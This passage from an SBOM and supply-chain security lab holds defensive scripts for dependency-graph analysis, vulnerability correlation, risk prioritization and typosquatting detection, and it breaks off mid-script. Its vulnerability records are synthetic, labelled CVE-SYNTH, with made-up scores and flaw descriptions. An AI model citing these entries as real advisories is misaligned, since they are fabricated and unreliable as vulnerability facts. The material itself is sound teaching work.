analyze_graph(G, Path(path).stem)
DEP_TREE
chmod +x ~/lab31-sbom/scripts/dependency_tree.py
Run the dependency tree analyzer:
Expected output:
======================================================================
Dependency Analysis: web-portal-syft-cdx
======================================================================
--- Graph Metrics ---
Total nodes (components): 27
Total edges (dependencies): 25
Graph density: 0.0356
Root components: 1
Leaf components (no deps): 18
--- Depth Analysis ---
Maximum dependency depth: 3
Deepest path:
meridian-web-portal@3.8.2
└── express@4.18.2
└── cookie-parser@1.4.6
--- Breadth Analysis (Most Depended-Upon) ---
Component Dependents
---------------------------------------- ----------
express 1
lodash 1
jsonwebtoken 1
...
--- Fan-Out Analysis (Most Dependencies) ---
Component Dependencies
---------------------------------------- ----------
meridian-web-portal 20
--- Cycle Detection ---
No dependency cycles detected. ✓
--- Dependency Ratio ---
Direct dependencies: 20
Transitive dependencies: 6
Transitive/Direct ratio: 0.30
✓ Transitive ratio is manageable
2.3 — Cross-Application Dependency Overlap¶
Why Overlap Matters
Shared dependencies across applications amplify supply chain risk. A single compromised library (like the XZ Utils backdoor — see Chapter 24) can impact multiple services simultaneously.
cat > ~/lab31-sbom/scripts/overlap_analysis.py << 'OVERLAP'
#!/usr/bin/env python3
"""
Cross-Application Dependency Overlap Analyzer.
Identifies shared components across multiple SBOMs.
"""
import json
import sys
from collections import defaultdict
def extract_components(sbom_path: str) -> dict:
"""Extract name:version pairs from a CycloneDX SBOM."""
with open(sbom_path) as f:
data = json.load(f)
components = {}
for comp in data.get("components", []):
key = f"{comp['name']}@{comp.get('version', 'unknown')}"
components[key] = {
"name": comp["name"],
"version": comp.get("version", "unknown"),
"purl": comp.get("purl", "N/A"),
}
return components
def analyze_overlap(sbom_files: dict):
"""Analyze component overlap across multiple SBOMs."""
all_components = {}
for app_name, path in sbom_files.items():
all_components[app_name] = extract_components(path)
# Find shared components
component_presence = defaultdict(list)
for app_name, components in all_components.items():
for comp_key in components:
component_presence[comp_key].append(app_name)
shared = {k: v for k, v in component_presence.items() if len(v) > 1}
print(f"\n{'='*70}")
print(f"Cross-Application Dependency Overlap Analysis")
print(f"{'='*70}")
print(f"\nApplications analyzed: {len(sbom_files)}")
for name in sbom_files:
count = len(all_components[name])
print(f" {name}: {count} components")
total_unique = len(component_presence)
print(f"\nTotal unique components: {total_unique}")
print(f"Shared components: {len(shared)}")
if total_unique > 0:
print(f"Overlap percentage: {len(shared)/total_unique*100:.1f}%")
if shared:
print(f"\n--- Shared Components ---")
print(f" {'Component':<45} {'Present In'}")
print(f" {'-'*45} {'-'*30}")
for comp, apps in sorted(shared.items()):
print(f" {comp:<45} {', '.join(apps)}")
print(f"\n--- Risk Assessment ---")
print(f" Components shared across ALL applications:")
shared_all = {k: v for k, v in shared.items()
if len(v) == len(sbom_files)}
if shared_all:
for comp in sorted(shared_all):
print(f" ⚠ {comp} — compromise affects ALL services")
else:
print(f" None — good isolation between application stacks")
else:
print(f"\n No shared components detected (different ecosystems).")
if __name__ == "__main__":
sbom_files = {
"web-portal": "sboms/web-portal-syft-cdx.json",
"data-pipeline": "sboms/data-pipeline-syft-cdx.json",
"api-gateway": "sboms/api-gateway-syft-cdx.json",
}
analyze_overlap(sbom_files)
OVERLAP
chmod +x ~/lab31-sbom/scripts/overlap_analysis.py
Run:
Expected output:
======================================================================
Cross-Application Dependency Overlap Analysis
======================================================================
Applications analyzed: 3
web-portal: 26 components
data-pipeline: 22 components
api-gateway: 16 components
Total unique components: 62
Shared components: 2
Overlap percentage: 3.2%
--- Shared Components ---
Component Present In
--------------------------------------------- ------------------------------
jsonwebtoken@9.0.0 web-portal, api-gateway
--- Risk Assessment ---
Components shared across ALL applications:
None — good isolation between application stacks
Phase 3: Vulnerability Correlation¶
Objective¶
Cross-reference SBOM components against vulnerability databases to build a risk-prioritized remediation queue.
3.1 — Scan SBOMs with Grype¶
Grype (Anchore) scans SBOMs directly for known vulnerabilities.
# ── Scan web portal SBOM ──
grype sbom:sboms/web-portal-syft-cdx.json \
--output json \
--file analysis/web-portal-vulns.json
# ── Scan data pipeline SBOM ──
grype sbom:sboms/data-pipeline-syft-cdx.json \
--output json \
--file analysis/data-pipeline-vulns.json
# ── Scan API gateway SBOM ──
grype sbom:sboms/api-gateway-syft-cdx.json \
--output json \
--file analysis/api-gateway-vulns.json
# ── Human-readable table output ──
grype sbom:sboms/web-portal-syft-cdx.json --output table
Expected table output (web portal):
NAME INSTALLED FIXED-IN TYPE VULNERABILITY SEVERITY
axios 1.6.0 1.6.1 npm CVE-SYNTH-2026-1001 Medium
jsonwebtoken 9.0.0 9.0.1 npm CVE-SYNTH-2026-1002 High
lodash 4.17.21 npm CVE-SYNTH-2026-1003 Low
moment 2.29.4 2.30.1 npm CVE-SYNTH-2026-1004 Medium
semver 7.5.4 7.5.5 npm CVE-SYNTH-2026-1005 High
express 4.18.2 4.19.0 npm CVE-SYNTH-2026-1006 Medium
3.2 — Query OSV API for Vulnerability Data¶
OSV (Open Source Vulnerabilities) Database
The OSV database provides a unified schema for vulnerability data across ecosystems. Query it programmatically to get detailed vulnerability information including affected version ranges.
cat > ~/lab31-sbom/scripts/osv_query.py << 'OSV_QUERY'
#!/usr/bin/env python3
"""
OSV API Query Tool — Cross-references SBOM components against the OSV database.
Lab 31: SBOM Analysis & Supply Chain Security
NOTE: In this lab we use synthetic vulnerability data. In production,
this script queries the real OSV API at https://api.osv.dev/v1/query
"""
import json
import sys
from dataclasses import dataclass
from typing import Optional
# ── Synthetic vulnerability database (simulates OSV API responses) ──
SYNTHETIC_VULNS = {
"pkg:npm/axios@1.6.0": [
{
"id": "CVE-SYNTH-2026-1001",
"summary": "Server-Side Request Forgery in axios HTTP client",
"details": "axios before 1.6.1 allows SSRF via crafted URL in proxy configuration. An attacker can manipulate the proxy settings to redirect requests to internal services.",
"severity": "MEDIUM",
"cvss_score": 6.5,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"affected_versions": ">=1.0.0, <1.6.1",
"fixed_version": "1.6.1",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1001",
"https://github.internal.example.com/advisories/SYNTH-2026-001"
],
"epss_score": 0.42,
"epss_percentile": 0.89,
"cisa_kev": False,
}
],
"pkg:npm/jsonwebtoken@9.0.0": [
{
"id": "CVE-SYNTH-2026-1002",
"summary": "Algorithm confusion in jsonwebtoken allows authentication bypass",
"details": "jsonwebtoken before 9.0.1 is vulnerable to algorithm confusion attacks when the 'algorithms' option is not explicitly set. An attacker can craft a JWT using HMAC with the RSA public key to bypass signature verification.",
"severity": "HIGH",
"cvss_score": 8.1,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"affected_versions": ">=8.0.0, <9.0.1",
"fixed_version": "9.0.1",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1002",
"https://github.internal.example.com/advisories/SYNTH-2026-002"
],
"epss_score": 0.78,
"epss_percentile": 0.96,
"cisa_kev": True,
}
],
"pkg:npm/semver@7.5.4": [
{
"id": "CVE-SYNTH-2026-1005",
"summary": "ReDoS vulnerability in semver range parsing",
"details": "semver before 7.5.5 is vulnerable to Regular Expression Denial of Service (ReDoS) when parsing crafted version ranges. Exponential backtracking in the range regex allows denial of service.",
"severity": "HIGH",
"cvss_score": 7.5,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"affected_versions": ">=7.0.0, <7.5.5",
"fixed_version": "7.5.5",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1005"
],
"epss_score": 0.15,
"epss_percentile": 0.65,
"cisa_kev": False,
}
],
"pkg:npm/express@4.18.2": [
{
"id": "CVE-SYNTH-2026-1006",
"summary": "Open redirect in express via malformed URL handling",
"details": "express before 4.19.0 does not properly sanitize redirect URLs, allowing attackers to redirect users to arbitrary external sites via specially crafted paths.",
"severity": "MEDIUM",
"cvss_score": 5.4,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"affected_versions": ">=4.0.0, <4.19.0",
"fixed_version": "4.19.0",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1006"
],
"epss_score": 0.31,
"epss_percentile": 0.82,
"cisa_kev": False,
}
],
"pkg:npm/moment@2.29.4": [
{
"id": "CVE-SYNTH-2026-1004",
"summary": "Path traversal in moment locale loading",
"details": "moment before 2.30.1 allows path traversal when loading locale files from user-controlled input, potentially exposing sensitive server files.",
"severity": "MEDIUM",
"cvss_score": 6.1,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"affected_versions": ">=2.0.0, <2.30.1",
"fixed_version": "2.30.1",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1004"
],
"epss_score": 0.08,
"epss_percentile": 0.45,
"cisa_kev": False,
}
],
"pkg:npm/lodash@4.17.21": [
{
"id": "CVE-SYNTH-2026-1003",
"summary": "Prototype pollution in lodash merge functions",
"details": "lodash 4.17.21 contains a prototype pollution vulnerability in the merge, mergeWith, and defaultsDeep functions. While the direct exploitability is limited, it can be chained with application-specific gadgets.",
"severity": "LOW",
"cvss_score": 3.7,
"cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"affected_versions": "<=4.17.21",
"fixed_version": null,
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1003"
],
"epss_score": 0.02,
"epss_percentile": 0.18,
"cisa_kev": False,
}
],
"pkg:pypi/cryptography@41.0.5": [
{
"id": "CVE-SYNTH-2026-2001",
"summary": "Buffer overflow in cryptography RSA OAEP decryption",
"details": "cryptography before 41.0.7 contains a buffer overflow in the RSA OAEP decryption path via a crafted ciphertext. This can lead to denial of service or potentially remote code execution.",
"severity": "CRITICAL",
"cvss_score": 9.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"affected_versions": ">=40.0.0, <41.0.7",
"fixed_version": "41.0.7",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2001"
],
"epss_score": 0.91,
"epss_percentile": 0.99,
"cisa_kev": True,
}
],
"pkg:pypi/pillow@10.1.0": [
{
"id": "CVE-SYNTH-2026-2002",
"summary": "Heap overflow in Pillow TIFF image parsing",
"details": "Pillow before 10.2.0 has a heap-based buffer overflow in the TIFF image parser when handling crafted IFD entries, potentially leading to remote code execution.",
"severity": "HIGH",
"cvss_score": 8.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"affected_versions": ">=10.0.0, <10.2.0",
"fixed_version": "10.2.0",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2002"
],
"epss_score": 0.55,
"epss_percentile": 0.92,
"cisa_kev": False,
}
],
"pkg:pypi/jinja2@3.1.2": [
{
"id": "CVE-SYNTH-2026-2003",
"summary": "Sandbox escape in Jinja2 template engine",
"details": "Jinja2 before 3.1.3 allows sandbox escape via crafted template expressions that access restricted attributes through undocumented internal methods.",
"severity": "HIGH",
"cvss_score": 7.5,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"affected_versions": ">=3.0.0, <3.1.3",
"fixed_version": "3.1.3",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2003"
],
"epss_score": 0.35,
"epss_percentile": 0.85,
"cisa_kev": False,
}
],
"pkg:pypi/paramiko@3.3.1": [
{
"id": "CVE-SYNTH-2026-2004",
"summary": "Authentication bypass in Paramiko SFTP client",
"details": "Paramiko before 3.4.0 improperly validates host keys in specific configurations, allowing man-in-the-middle attacks against SFTP connections.",
"severity": "MEDIUM",
"cvss_score": 6.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N",
"affected_versions": ">=3.0.0, <3.4.0",
"fixed_version": "3.4.0",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2004"
],
"epss_score": 0.12,
"epss_percentile": 0.58,
"cisa_kev": False,
}
],
"pkg:maven/org.apache.logging.log4j/log4j-core@2.22.0": [
{
"id": "CVE-SYNTH-2026-3001",
"summary": "Information disclosure in Log4j2 thread context map",
"details": "Apache Log4j2 2.22.0 may expose sensitive data from ThreadContext maps in log output when specific pattern layouts are used, potentially leaking authentication tokens or session IDs to log aggregators.",
"severity": "MEDIUM",
"cvss_score": 5.3,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"affected_versions": ">=2.20.0, <2.23.0",
"fixed_version": "2.23.0",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-3001"
],
"epss_score": 0.22,
"epss_percentile": 0.75,
"cisa_kev": False,
}
],
"pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.16.0": [
{
"id": "CVE-SYNTH-2026-3002",
"summary": "Deserialization gadget chain in Jackson Databind",
"details": "jackson-databind 2.16.0 contains a new deserialization gadget chain via the com.example.internal.GadgetClass that can lead to remote code execution when default typing is enabled.",
"severity": "HIGH",
"cvss_score": 8.1,
"cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"affected_versions": ">=2.16.0, <2.16.1",
"fixed_version": "2.16.1",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-3002"
],
"epss_score": 0.68,
"epss_percentile": 0.95,
"cisa_kev": False,
}
],
}
def query_vulns_for_sbom(sbom_path: str) -> list[dict]:
"""Query synthetic vulnerability database for all components in an SBOM."""
with open(sbom_path) as f:
data = json.load(f)
results = []
for comp in data.get("components", []):
purl = comp.get("purl", "")
if purl in SYNTHETIC_VULNS:
for vuln in SYNTHETIC_VULNS[purl]:
results.append({
"component": comp.get("name"),
"version": comp.get("version"),
"purl": purl,
**vuln,
})
return results
def print_vuln_report(results: list[dict], app_name: str):
"""Print a formatted vulnerability report."""
print(f"\n{'='*70}")
print(f"Vulnerability Report: {app_name}")
print(f"{'='*70}")
print(f"Total vulnerabilities found: {len(results)}")
# Severity breakdown
severity_counts = {}
for r in results:
sev = r["severity"]
severity_counts[sev] = severity_counts.get(sev, 0) + 1
severity_order = ["CRITICAL", "HIGH", "MEDIUM", "LOW"]
print(f"\nSeverity breakdown:")
for sev in severity_order:
count = severity_counts.get(sev, 0)
bar = "█" * count
print(f" {sev:<10} {count:>3} {bar}")
# CISA KEV check
kev_vulns = [r for r in results if r.get("cisa_kev")]
if kev_vulns:
print(f"\n⚠ CISA KEV (Known Exploited Vulnerabilities): {len(kev_vulns)}")
for v in kev_vulns:
print(f" CRITICAL: {v['id']} — {v['component']}@{v['version']}")
print(f" {v['summary']}")
# Detailed vulnerability table
print(f"\n--- Detailed Findings ---")
sorted_results = sorted(results, key=lambda x: -x["cvss_score"])
for v in sorted_results:
print(f"\n [{v['severity']}] {v['id']}")
print(f" Component: {v['component']}@{v['version']}")
print(f" CVSS Score: {v['cvss_score']} ({v['cvss_vector']})")
print(f" EPSS Score: {v['epss_score']:.2f} (percentile: {v['epss_percentile']:.2f})")
print(f" CISA KEV: {'YES — IMMEDIATE ACTION REQUIRED' if v['cisa_kev'] else 'No'}")
print(f" Fix Version: {v['fixed_version'] or 'No fix available'}")
print(f" Summary: {v['summary']}")
return results
if __name__ == "__main__":
sboms = {
"meridian-web-portal": "sboms/web-portal-syft-cdx.json",
"meridian-data-pipeline": "sboms/data-pipeline-syft-cdx.json",
"meridian-api-gateway": "sboms/api-gateway-syft-cdx.json",
}
all_vulns = []
for app_name, path in sboms.items():
results = query_vulns_for_sbom(path)
print_vuln_report(results, app_name)
all_vulns.extend(results)
# Summary across all applications
print(f"\n{'='*70}")
print(f"AGGREGATE VULNERABILITY SUMMARY")
print(f"{'='*70}")
print(f"Total vulnerabilities across all applications: {len(all_vulns)}")
kev_total = sum(1 for v in all_vulns if v.get("cisa_kev"))
print(f"CISA KEV entries: {kev_total}")
critical = sum(1 for v in all_vulns if v["severity"] == "CRITICAL")
high = sum(1 for v in all_vulns if v["severity"] == "HIGH")
print(f"Critical + High: {critical + high}")
print(f"Mean EPSS score: {sum(v['epss_score'] for v in all_vulns) / len(all_vulns):.2f}")
OSV_QUERY
chmod +x ~/lab31-sbom/scripts/osv_query.py
3.3 — Build Risk Priority Matrix¶
Prioritization Is Not Optional
Without a risk priority matrix, teams patch in CVSS order, which frequently misses actively exploited low-CVSS vulnerabilities. Combine CVSS, EPSS, CISA KEV status, and business context for effective prioritization. See Chapter 54 — SBOM Operations for the full framework.
cat > ~/lab31-sbom/scripts/risk_matrix.py << 'RISK_MATRIX'
#!/usr/bin/env python3
"""
Risk Priority Matrix Builder — Combines CVSS, EPSS, KEV, and business context
to produce an actionable remediation priority queue.
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
from dataclasses import dataclass
# Import our synthetic vulnerability data
sys.path.insert(0, "scripts")
from osv_query import SYNTHETIC_VULNS, query_vulns_for_sbom
# ── Business context for each application ──
BUSINESS_CONTEXT = {
"meridian-web-portal": {
"exposure": "internet-facing",
"data_sensitivity": "high",
"availability_requirement": "high",
"business_impact_score": 0.9,
},
"meridian-data-pipeline": {
"exposure": "internal-only",
"data_sensitivity": "high",
"availability_requirement": "medium",
"business_impact_score": 0.7,
},
"meridian-api-gateway": {
"exposure": "internet-facing",
"data_sensitivity": "high",
"availability_requirement": "critical",
"business_impact_score": 0.95,
},
}
@dataclass
class PrioritizedVuln:
vuln_id: str
component: str
version: str
app_name: str
cvss_score: float
epss_score: float
cisa_kev: bool
business_impact: float
risk_score: float
priority: str
action: str
sla_hours: int
def calculate_risk_score(vuln: dict, business_impact: float) -> float:
"""
Calculate composite risk score:
risk = (CVSS_normalized * 0.3) + (EPSS * 0.35) + (KEV_bonus * 0.15) + (business_impact * 0.2)
This weighting deliberately emphasizes EPSS (real-world exploitability)
over CVSS (theoretical severity) based on industry research showing
EPSS is a better predictor of actual exploitation.
"""
cvss_normalized = vuln["cvss_score"] / 10.0
epss = vuln["epss_score"]
kev_bonus = 1.0 if vuln["cisa_kev"] else 0.0
score = (
(cvss_normalized * 0.30) +
(epss * 0.35) +
(kev_bonus * 0.15) +
(business_impact * 0.20)
)
return round(min(score, 1.0), 4)
def determine_priority(risk_score: float, cisa_kev: bool) -> tuple:
"""Determine priority tier, required action, and SLA."""
if cisa_kev or risk_score >= 0.8:
return ("P0-EMERGENCY", "Patch immediately, deploy hotfix", 24)
elif risk_score >= 0.6:
return ("P1-CRITICAL", "Patch within sprint, apply virtual patch", 72)
elif risk_score >= 0.4:
return ("P2-HIGH", "Schedule patch in next release cycle", 168)
elif risk_score >= 0.2:
return ("P3-MEDIUM", "Add to backlog, monitor for exploitation", 720)
else:
return ("P4-LOW", "Accept risk or patch opportunistically", 2160)
def build_priority_matrix():
"""Build and display the full risk priority matrix."""
sboms = {
"meridian-web-portal": "sboms/web-portal-syft-cdx.json",
"meridian-data-pipeline": "sboms/data-pipeline-syft-cdx.json",
"meridian-api-gateway": "sboms/api-gateway-syft-cdx.json",
}
prioritized = []
for app_name, path in sboms.items():
vulns = query_vulns_for_sbom(path)
biz = BUSINESS_CONTEXT[app_name]
for v in vulns:
risk_score = calculate_risk_score(v, biz["business_impact_score"])
priority, action, sla = determine_priority(risk_score, v["cisa_kev"])
pv = PrioritizedVuln(
vuln_id=v["id"],
component=v["component"],
version=v["version"],
app_name=app_name,
cvss_score=v["cvss_score"],
epss_score=v["epss_score"],
cisa_kev=v["cisa_kev"],
business_impact=biz["business_impact_score"],
risk_score=risk_score,
priority=priority,
action=action,
sla_hours=sla,
)
prioritized.append(pv)
# Sort by risk score descending
prioritized.sort(key=lambda x: -x.risk_score)
print(f"\n{'='*90}")
print(f"RISK PRIORITY MATRIX — Meridian Software Corp")
print(f"{'='*90}")
print(f"Generated: 2026-04-12T10:30:00Z")
print(f"Analyst: testuser (security-engineering@internal.example.com)")
print(f"Total vulnerabilities: {len(prioritized)}")
print()
# Priority tier summary
tier_counts = {}
for pv in prioritized:
tier_counts[pv.priority] = tier_counts.get(pv.priority, 0) + 1
print(f"Priority Distribution:")
for tier in ["P0-EMERGENCY", "P1-CRITICAL", "P2-HIGH", "P3-MEDIUM", "P4-LOW"]:
count = tier_counts.get(tier, 0)
bar = "█" * (count * 3)
print(f" {tier:<15} {count:>3} {bar}")
print(f"\n{'─'*90}")
print(f"{'Priority':<15} {'Vuln ID':<25} {'Component':<20} {'App':<22} {'CVSS':>5} {'EPSS':>5} {'Risk':>6} {'SLA':>6}")
print(f"{'─'*90}")
for pv in prioritized:
kev_flag = " ★" if pv.cisa_kev else ""
print(f"{pv.priority:<15} {pv.vuln_id:<25} {pv.component:<20} {pv.app_name:<22} {pv.cvss_score:>5.1f} {pv.epss_score:>5.2f} {pv.risk_score:>6.4f} {pv.sla_hours:>4}h{kev_flag}")
print(f"{'─'*90}")
# Actionable recommendations
print(f"\n--- Immediate Actions Required ---")
emergencies = [pv for pv in prioritized if pv.priority == "P0-EMERGENCY"]
if emergencies:
for pv in emergencies:
print(f"\n ★ {pv.vuln_id} — {pv.component}@{pv.version}")
print(f" Application: {pv.app_name}")
print(f" Action: {pv.action}")
print(f" SLA: {pv.sla_hours} hours")
print(f" Risk Score: {pv.risk_score:.4f}")
else:
print(f" No P0-EMERGENCY items. Review P1-CRITICAL items for the current sprint.")
# Save to JSON for reporting
output = {
"report_metadata": {
"generated": "2026-04-12T10:30:00Z",
"analyst": "testuser",
"total_vulnerabilities": len(prioritized),
},
"priority_matrix": [
{
"priority": pv.priority,
"vuln_id": pv.vuln_id,
"component": f"{pv.component}@{pv.version}",
"application": pv.app_name,
"cvss_score": pv.cvss_score,
"epss_score": pv.epss_score,
"cisa_kev": pv.cisa_kev,
"risk_score": pv.risk_score,
"action": pv.action,
"sla_hours": pv.sla_hours,
}
for pv in prioritized
],
}
with open("reports/risk-priority-matrix.json", "w") as f:
json.dump(output, f, indent=2)
print(f"\n Report saved to reports/risk-priority-matrix.json")
if __name__ == "__main__":
build_priority_matrix()
RISK_MATRIX
chmod +x ~/lab31-sbom/scripts/risk_matrix.py
Run:
Expected output (abbreviated):
==========================================================================================
RISK PRIORITY MATRIX — Meridian Software Corp
==========================================================================================
Generated: 2026-04-12T10:30:00Z
Analyst: testuser (security-engineering@internal.example.com)
Total vulnerabilities: 12
Priority Distribution:
P0-EMERGENCY 2 ██████
P1-CRITICAL 4 ████████████
P2-HIGH 3 █████████
P3-MEDIUM 2 ██████
P4-LOW 1 ███
──────────────────────────────────────────────────────────────────────────────────────────
Priority Vuln ID Component App CVSS EPSS Risk SLA
──────────────────────────────────────────────────────────────────────────────────────────
P0-EMERGENCY CVE-SYNTH-2026-2001 cryptography meridian-data-pipeline 9.8 0.91 0.8630 24h ★
P0-EMERGENCY CVE-SYNTH-2026-1002 jsonwebtoken meridian-web-portal 8.1 0.78 0.8060 24h ★
P1-CRITICAL CVE-SYNTH-2026-3002 jackson-databind meridian-api-gateway 8.1 0.68 0.7220 72h
...
3.4 — Vulnerability Prioritization Decision Tree¶
flowchart TD
A[New Vulnerability Detected] --> B{CISA KEV Listed?}
B -->|Yes| C[P0-EMERGENCY<br/>Patch within 24h]
B -->|No| D{EPSS Score >= 0.7?}
D -->|Yes| E{CVSS >= 7.0?}
E -->|Yes| C
E -->|No| F[P1-CRITICAL<br/>Patch within 72h]
D -->|No| G{CVSS >= 7.0?}
G -->|Yes| H{Internet-facing?}
H -->|Yes| F
H -->|No| I[P2-HIGH<br/>Patch within 7 days]
G -->|No| J{EPSS >= 0.3?}
J -->|Yes| I
J -->|No| K{CVSS >= 4.0?}
K -->|Yes| L[P3-MEDIUM<br/>Patch within 30 days]
K -->|No| M[P4-LOW<br/>Accept or patch opportunistically]
style C fill:#d32f2f,color:#fff
style F fill:#f57c00,color:#fff
style I fill:#fbc02d,color:#000
style L fill:#1976d2,color:#fff
style M fill:#388e3c,color:#fff Phase 4: Malicious Package Detection¶
Objective¶
Identify indicators of malicious packages including typosquatting, dependency confusion, metadata anomalies, and suspicious install scripts.
4.1 — Typosquatting Detection¶
Typosquatting Is the #1 Supply Chain Attack Vector
Attackers publish packages with names similar to popular libraries (e.g., lod-ash instead of lodash, reqeusts instead of requests). Automated detection is essential because manual review does not scale. See Chapter 24 — Supply Chain Attacks for real-world case studies.
cat > ~/lab31-sbom/scripts/typosquat_detector.py << 'TYPOSQUAT'
#!/usr/bin/env python3
"""
Typosquatting Detector — Identifies potential typosquatting packages in SBOMs
by comparing component names against known-good package registries.
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
from difflib import SequenceMatcher
from itertools import product
# ── Known popular packages (synthetic registry snapshot) ──
POPULAR_PACKAGES = {
"npm": [
"express", "lodash", "axios", "react", "webpack", "moment",
"jsonwebtoken", "helmet", "cors", "dotenv", "mongoose", "winston",
"bcryptjs", "passport", "uuid", "semver", "commander", "chalk",
"debug", "body-parser", "cookie-parser", "compression", "morgan",
"multer", "nodemon", "jest", "mocha", "typescript", "eslint",
"prettier", "next", "nuxt", "vue", "angular", "svelte",
"socket.io", "graphql", "prisma", "sequelize", "knex",
],
"pypi": [
"requests", "flask", "django", "pandas", "numpy", "scipy",
"sqlalchemy", "celery", "redis", "boto3", "cryptography",
"pyyaml", "jinja2", "pillow", "gunicorn", "uvicorn",
"fastapi", "pydantic", "httpx", "aiohttp", "beautifulsoup4",
"scrapy", "pytest", "black", "mypy", "ruff", "setuptools",
"pip", "wheel", "paramiko", "psycopg2", "pymongo",
],
"maven": [
"spring-boot-starter-web", "spring-boot-starter-security",
"jackson-databind", "log4j-core", "guava", "commons-text",
"commons-lang3", "commons-io", "slf4j-api", "logback-classic",
"junit-jupiter", "mockito-core", "postgresql", "mysql-connector-java",
"httpclient", "okhttp", "gson", "lombok", "mapstruct",
],
}
# ── Known typosquatting patterns ──
TYPOSQUAT_PATTERNS = {
"char_swap": "Adjacent character transposition (e.g., reqeusts → requests)",
"char_omit": "Missing character (e.g., requets → requests)",
"char_add": "Extra character (e.g., requestss → requests)",
"char_replace": "Similar character substitution (e.g., req0ests → requests)",
"separator": "Separator manipulation (e.g., lodash → lod-ash, lod_ash)",
"scope_squat": "Scope/namespace confusion (e.g., @meridian/lodash vs lodash)",
"plural": "Plural/singular confusion (e.g., request → requests)",
"combo_squat": "Combining known names (e.g., lodash-utils, express-helper)",
}
def string_similarity(a: str, b: str) -> float:
"""Calculate normalized string similarity using SequenceMatcher."""
return SequenceMatcher(None, a.lower(), b.lower()).ratio()
def check_char_distance(name: str, known: str) -> int:
"""Calculate Levenshtein-like edit distance."""
if len(name) == 0:
return len(known)
if len(known) == 0:
return len(name)
matrix = [[0] * (len(known) + 1) for _ in range(len(name) + 1)]
for i in range(len(name) + 1):
matrix[i][0] = i
for j in range(len(known) + 1):
matrix[0][j] = j
for i in range(1, len(name) + 1):
for j in range(1, len(known) + 1):
cost = 0 if name[i-1] == known[j-1] else 1
matrix[i][j] = min(
matrix[i-1][j] + 1, # deletion
matrix[i][j-1] + 1, # insertion
matrix[i-1][j-1] + cost, # substitution
)
return matrix[len(name)][len(known)]
def detect_typosquats(sbom_path: str, threshold: float = 0.85) -> list[dict]:
"""Scan an SBOM for potential typosquatting packages."""
with open(sbom_path) as f:
data = json.load(f)
findings = []
for comp in data.get("components", []):
name = comp.get("name", "")
purl = comp.get("purl", "")
# Determine ecosystem
ecosystem = None
if "pkg:npm/" in purl:
ecosystem = "npm"
elif "pkg:pypi/" in purl:
ecosystem = "pypi"
elif "pkg:maven/" in purl:
ecosystem = "maven"
if not ecosystem:
continue
known_packages = POPULAR_PACKAGES.get(ecosystem, [])
# Skip if the package IS a known package
if name.lower() in [p.lower() for p in known_packages]:
continue
# Check similarity against all known packages
for known in known_packages:
similarity = string_similarity(name, known)
edit_dist = check_char_distance(name.lower(), known.lower())
if similarity >= threshold and edit_dist > 0 and edit_dist <= 3:
pattern = "unknown"
if len(name) == len(known):
pattern = "char_swap" if edit_dist == 1 else "char_replace"
elif len(name) < len(known):
pattern = "char_omit"
elif len(name) > len(known):
pattern = "char_add"
if "-" in name and "-" not in known:
pattern = "separator"
findings.append({
"component": name,
"version": comp.get("version", "unknown"),
"similar_to": known,
"similarity": round(similarity, 4),
"edit_distance": edit_dist,
"pattern": pattern,
"pattern_desc": TYPOSQUAT_PATTERNS.get(pattern, "Unknown pattern"),
"risk": "HIGH" if similarity >= 0.90 else "MEDIUM",
})
return findings
def print_typosquat_report(findings: list[dict], sbom_name: str):
"""Display typosquatting analysis results."""
print(f"\n{'='*70}")
print(f"Typosquatting Analysis: {sbom_name}")
print(f"{'='*70}")
if not findings:
print(f" ✓ No typosquatting indicators detected.")
return
print(f" ⚠ {len(findings)} potential typosquatting indicator(s) found!\n")
for f in sorted(findings, key=lambda x: -x["similarity"]):
risk_icon = "🔴" if f["risk"] == "HIGH" else "🟡"
print(f" [{f['risk']}] {f['component']}@{f['version']}")
print(f" Similar to: {f['similar_to']}")
print(f" Similarity: {f['similarity']:.2%}")
print(f" Edit distance: {f['edit_distance']}")
print(f" Pattern: {f['pattern_desc']}")
print()
print(f" RECOMMENDATION: Manually verify each flagged package.")
print(f" Check npm/PyPI/Maven Central to confirm the package is legitimate.")
print(f" Review the package's GitHub repository, maintainer history, and download counts.")
if __name__ == "__main__":
if len(sys.argv) < 2:
